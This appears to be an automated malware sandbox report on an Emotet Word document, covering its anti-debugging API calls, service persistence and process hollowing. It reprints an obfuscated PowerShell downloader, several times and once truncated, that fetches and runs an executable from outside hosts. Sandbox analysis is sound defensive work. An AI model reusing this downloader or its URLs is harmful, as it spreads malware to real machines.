DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/LoadLibraryExA
DynamicLoader: kernel32.dll/mknjht34tfserdgfwGetProcAddress
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryExA
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/LoadLibraryExA
DynamicLoader: kernel32.dll/mknjht34tfserdgfwGetProcAddress
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryExA
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: propsys.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/PSCreatePropertyStoreFromObject
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PropVariantToBuffer
DynamicLoader: propsys.dll/PropVariantToUInt64
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: propsys.dll/InitPropVariantFromBuffer
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/TreeSetNamedSecurityInfoW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
Performs HTTP requests potentially not found in PCAP.
url: test5.freebottlepc.com:80//tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/
Executed a very long command line or script command which may be indicative of chained commands or obfuscation
command: powershell -enc JABjADYANwA5ADQANQA3ADYAPQAnAE0ANwA4ADgANwAwADIAMwAnADsAJABhADYAMAA4ADkAMAA2ACAAPQAgACcANQAzADEAJwA7ACQAUAA2ADcAMAA1ADQANwA9ACcAaAAxADEAMwAyADAAMAAnADsAJABJADMANwA1ADQANAA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADYAMAA4ADkAMAA2ACsAJwAuAGUAeABlACcAOwAkAEkAMAA5ADcAOQA0ADEAMAA9ACcAcAA3ADcAXwA4ADIAJwA7ACQAcQA3ADgANABfADQANAA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBgAGUAYABUAC4AdwBFAGIAYwBgAGwAYABJAGUATgB0ADsAJABsAF8ANwAzADIANgA9ACcAaAB0AHQAcABzADoALwAvAGsAcwBpAGMAYQByAGQAbwAuAGMAbwBtAC8AdAByAGEAdgBlAGwALwBuAHQASwBXAHoASQB5AEQAbAAvAEAAaAB0AHQAcAA6AC8ALwBpAGEAbQB6AGIALgBjAG8AbQAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwBzAHkAcwB0AGUAbQBfAHcAZQBiAC8ARwBBAEEAZgBSAFoATQBxAC8AQABoAHQAdABwADoALwAvAG0AYQBsAG8AbgBpAG4AYwAuAGMAbwBtAC8AYQBwAHAAcwAvAEcAYgBCAFoAbwBtAFEAagBTAC8AQABoAHQAdABwADoALwAvAGsAdQBtAGEAawB1AG4ALgBjAG8AbQAvADcAagBlAHQALwAzAGIAMgA0ADQANgA3ADIAegBlAF8AYgB0AHUAbQBuAGMAMABoAC0AMgAxADcAOAA4ADkANgAvAEAAaAB0AHQAcABzADoALwAvAGkAbgBnAGUAZwBuAGUAcgBpAGEAZABlAGwAdwBlAGIALgBjAG8AbQAvAGYAYQBuAHQAYQBjAGEAbABjAGkAbwAvADgANgAxADEAbABqAG8AbwBfAG8ANAB5ADAAMgAzAHcALQAzADcANQA0ADcAMAA0ADMANwAxAC8AJwAuAFMAUABMAEkAdAAoACcAQAAnACkAOwAkAHcAMABfADIAXwAzADMANAA9ACcAVQA2ADgAMQA5ADQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBfADQANgA3ADEAMQA4ACAAaQBuACAAJABsAF8ANwAzADIANgApAHsAdAByAHkAewAkAHEANwA4ADQAXwA0ADQALgBEAG8AVwBuAEwAbwBBAGQARgBpAEwARQAoACQAVwBfADQANgA3ADEAMQA4ACwAIAAkAEkAMwA3ADUANAA0ADkAKQA7ACQAbgA4ADQAMAA3ADUANAA2AD0AJwBGADQAMgAwAF8AMAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAMwA3ADUANAA0ADkAKQAuAEwAZQBuAEcAVABIACAALQBnAGUAIAAyADkANQAzADMAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAgACQASQAzADcANQA0ADQAOQA7ACQAcgA3ADQANgAyADYAPQAnAGkAOQAwADMANwAyADMAJwA7AGIAcgBlAGEAawA7ACQAaAAxADUAOAA4ADgAPQAnAEQAMwA0ADcAOAAzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAOAAzADUAMwAzADUAPQAnAGoAOQAyADAANgAyACcA
A scripting utility was executed
command: powershell -enc JABjADYANwA5ADQANQA3ADYAPQAnAE0ANwA4ADgANwAwADIAMwAnADsAJABhADYAMAA4ADkAMAA2ACAAPQAgACcANQAzADEAJwA7ACQAUAA2ADcAMAA1ADQANwA9ACcAaAAxADEAMwAyADAAMAAnADsAJABJADMANwA1ADQANAA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADYAMAA4ADkAMAA2ACsAJwAuAGUAeABlACcAOwAkAEkAMAA5ADcAOQA0ADEAMAA9ACcAcAA3ADcAXwA4ADIAJwA7ACQAcQA3ADgANABfADQANAA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBgAGUAYABUAC4AdwBFAGIAYwBgAGwAYABJAGUATgB0ADsAJABsAF8ANwAzADIANgA9ACcAaAB0AHQAcABzADoALwAvAGsAcwBpAGMAYQByAGQAbwAuAGMAbwBtAC8AdAByAGEAdgBlAGwALwBuAHQASwBXAHoASQB5AEQAbAAvAEAAaAB0AHQAcAA6AC8ALwBpAGEAbQB6AGIALgBjAG8AbQAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwBzAHkAcwB0AGUAbQBfAHcAZQBiAC8ARwBBAEEAZgBSAFoATQBxAC8AQABoAHQAdABwADoALwAvAG0AYQBsAG8AbgBpAG4AYwAuAGMAbwBtAC8AYQBwAHAAcwAvAEcAYgBCAFoAbwBtAFEAagBTAC8AQABoAHQAdABwADoALwAvAGsAdQBtAGEAawB1AG4ALgBjAG8AbQAvADcAagBlAHQALwAzAGIAMgA0ADQANgA3ADIAegBlAF8AYgB0AHUAbQBuAGMAMABoAC0AMgAxADcAOAA4ADkANgAvAEAAaAB0AHQAcABzADoALwAvAGkAbgBnAGUAZwBuAGUAcgBpAGEAZABlAGwAdwBlAGIALgBjAG8AbQAvAGYAYQBuAHQAYQBjAGEAbABjAGkAbwAvADgANgAxADEAbABqAG8AbwBfAG8ANAB5ADAAMgAzAHcALQAzADcANQA0ADcAMAA0ADMANwAxAC8AJwAuAFMAUABMAEkAdAAoACcAQAAnACkAOwAkAHcAMABfADIAXwAzADMANAA9ACcAVQA2ADgAMQA5ADQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBfADQANgA3ADEAMQA4ACAAaQBuACAAJABsAF8ANwAzADIANgApAHsAdAByAHkAewAkAHEANwA4ADQAXwA0ADQALgBEAG8AVwBuAEwAbwBBAGQARgBpAEwARQAoACQAVwBfADQANgA3ADEAMQA4ACwAIAAkAEkAMwA3ADUANAA0ADkAKQA7ACQAbgA4ADQAMAA3ADUANAA2AD0AJwBGADQAMgAwAF8AMAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAMwA3ADUANAA0ADkAKQAuAEwAZQBuAEcAVABIACAALQBnAGUAIAAyADkANQAzADMAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAgACQASQAzADcANQA0ADQAOQA7ACQAcgA3ADQANgAyADYAPQAnAGkAOQAwADMANwAyADMAJwA7AGIAcgBlAGEAawA7ACQAaAAxADUAOAA4ADgAPQAnAEQAMwA0ADcAOAAzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAOAAzADUAMwAzADUAPQAnAGoAOQAyADAANgAyACcA
Uses Windows utilities for basic functionality
command: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc"
command: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc
Queries information on disks, possibly for anti-virtualization
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
Behavioural detection: Transacted Hollowing
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: services.exe (460) called API GetSystemTimeAsFileTime 1611407 times
Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config
regkeyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache
Installs itself for autorun at Windows startup
service name: gluerel
service path: "C:\Windows\SysWOW64\gluerel.exe"
key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\ImagePath
data: "C:\Windows\SysWOW64\gluerel.exe"
CAPE detected the Emotet malware family
A script or command line contains a long continuous string indicative of obfuscation
command: powershell -enc JABjADYANwA5ADQANQA3ADYAPQAnAE0ANwA4ADgANwAwADIAMwAnADsAJABhADYAMAA4ADkAMAA2ACAAPQAgACcANQAzADEAJwA7ACQAUAA2ADcAMAA1ADQANwA9ACcAaAAxADEAMwAyADAAMAAnADsAJABJADMANwA1ADQANAA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADYAMAA4ADkAMAA2ACsAJwAuAGUAeABlACcAOwAkAEkAMAA5ADcAOQA0ADEAMAA9ACcAcAA3ADcAXwA4ADIAJwA7ACQAcQA3ADgANABfADQANAA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBgAGUAYABUAC4AdwBFAGIAYwBgAGwAYABJAGUATgB0ADsAJABsAF8ANwAzADIANgA9ACcAaAB0AHQAcABzADoALwAvAGsAcwBpAGMAYQByAGQAbwAuAGMAbwBtAC8AdAByAGEAdgBlAGwALwBuAHQASwBXAHoASQB5AEQAbAAvAEAAaAB0AHQAcAA6AC8ALwBpAGEAbQB6AGIALgBjAG8AbQAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwBzAHkAcwB0AGUAbQBfAHcAZQBiAC8ARwBBAEEAZgBSAFoATQBxAC8AQABoAHQAdABwADoALwAvAG0AYQBsAG8AbgBpAG4AYwAuAGMAbwBtAC8AYQBwAHAAcwAvAEcAYgBCAFoAbwBtAFEAagBTAC8AQABoAHQAdABwADoALwAvAGsAdQBtAGEAawB1AG4ALgBjAG8AbQAvADcAagBlAHQALwAzAGIAMgA0ADQANgA3ADIAegBlAF8AYgB0AHUAbQBuAGMAMABoAC0AMgAxADcAOAA4ADkANgAvAEAAaAB0AHQAcABzADoALwAvAGkAbgBnAGUAZwBuAGUAcgBpAGEAZABlAGwAdwBlAGIALgBjAG8AbQAvAGYAYQBuAHQAYQBjAGEAbABjAGkAbwAvADgANgAxADEAbABqAG8AbwBfAG8ANAB5ADAAMgAzAHcALQAzADcANQA0ADcAMAA0ADMANwAxAC8AJwAuAFMAUABMAEkAdAAoACcAQAAnACkAOwAkAHcAMABfADIAXwAzADMANAA9ACcAVQA2ADgAMQA5ADQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBfADQANgA3ADEAMQA4ACAAaQBuACAAJABsAF8ANwAzADIANgApAHsAdAByAHkAewAkAHEANwA4ADQAXwA0ADQALgBEAG8AVwBuAEwAbwBBAGQARgBpAEwARQAoACQAVwBfADQANgA3ADEAMQA4ACwAIAAkAEkAMwA3ADUANAA0ADkAKQA7ACQAbgA4ADQAMAA3ADUANAA2AD0AJwBGADQAMgAwAF8AMAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAMwA3ADUANAA0ADkAKQAuAEwAZQBuAEcAVABIACAALQBnAGUAIAAyADkANQAzADMAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAgACQASQAzADcANQA0ADQAOQA7ACQAcgA3ADQANgAyADYAPQAnAGkAOQAwADMANwAyADMAJwA7AGIAcgBlAGEAawA7ACQAaAAxADUAOAA4ADgAPQAnAEQAMwA0ADcAOAAzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAOAAzADUAMwAzADUAPQAnAGoAOQAyADAANgAyACcA
Drops a binary and executes it
binary: C:\Users\user\531.exe
Martian Subprocess Started By IE
ie_martian: c:\program files (x86)\microsoft office\office14\winword.exe
ie_martian: c:\windows\splwow64.exe
Attempts to modify Microsoft Office security settings
Created a service that was not started
service: gluerel
Attempts to execute suspicious powershell command arguments
command: powershell -enc JABjADYANwA5ADQANQA3ADYAPQAnAE0ANwA4ADgANwAwADIAMwAnADsAJABhADYAMAA4ADkAMAA2ACAAPQAgACcANQAzADEAJwA7ACQAUAA2ADcAMAA1ADQANwA9ACcAaAAxADEAMwAyADAAMAAnADsAJABJADMANwA1ADQANAA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADYAMAA4ADkAMAA2ACsAJwAuAGUAeABlACcAOwAkAEkAMAA5ADcAOQA0ADEAMAA9ACcAcAA3ADcAXwA4ADIAJwA7ACQAcQA3ADgANABfADQANAA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBgAGUAYABUAC4AdwBFAGIAYwBgAGwAYABJAGUATgB0ADsAJABsAF8ANwAzADIANgA9ACcAaAB0AHQAcABzADoALwAvAGsAcwBpAGMAYQByAGQAbwAuAGMAbwBtAC8AdAByAGEAdgBlAGwALwBuAHQASwBXAHoASQB5AEQAbAAvAEAAaAB0AHQAcAA6AC8ALwBpAGEAbQB6AGIALgBjAG8AbQAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwBzAHkAcwB0AGUAbQBfAHcAZQBiAC8ARwBBAEEAZgBSAFoATQBxAC8AQABoAHQAdABwADoALwAvAG0AYQBsAG8AbgBpAG4AYwAuAGMAbwBtAC8AYQBwAHAAcwAvAEcAYgBCAFoAbwBtAFEAagBTAC8AQABoAHQAdABwADoALwAvAGsAdQBtAGEAawB1AG4ALgBjAG8AbQAvADcAagBlAHQALwAzAGIAMgA0ADQANgA3ADIAegBlAF8AYgB0AHUAbQBuAGMAMABoAC0AMgAxADcAOAA4ADkANgAvAEAAaAB0AHQAcABzADoALwAvAGkAbgBnAGUAZwBuAGUAcgBpAGEAZABlAGwAdwBlAGIALgBjAG8AbQAvAGYAYQBuAHQAYQBjAGEAbABjAGkAbwAvADgANgAxADEAbABqAG8AbwBfAG8ANAB5ADAAMgAzAHcALQAzADcANQA0ADcAMAA0ADMANwAxAC8AJwAuAFMAUABMAEkAdAAoACcAQAAnACkAOwAkAHcAMABfADIAXwAzADMANAA9ACcAVQA2ADgAMQA5ADQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBfADQANgA3ADEAMQA4ACAAaQBuACAAJABsAF8ANwAzADIANgApAHsAdAByAHkAewAkAHEANwA4ADQAXwA0ADQALgBEAG8AVwBuAEwAbwBBAGQARgBpAEwARQAoACQAVwBfADQANgA3ADEAMQA4ACwAIAAkAEkAMwA3ADUANAA0ADkAKQA7ACQAbgA4ADQAMAA3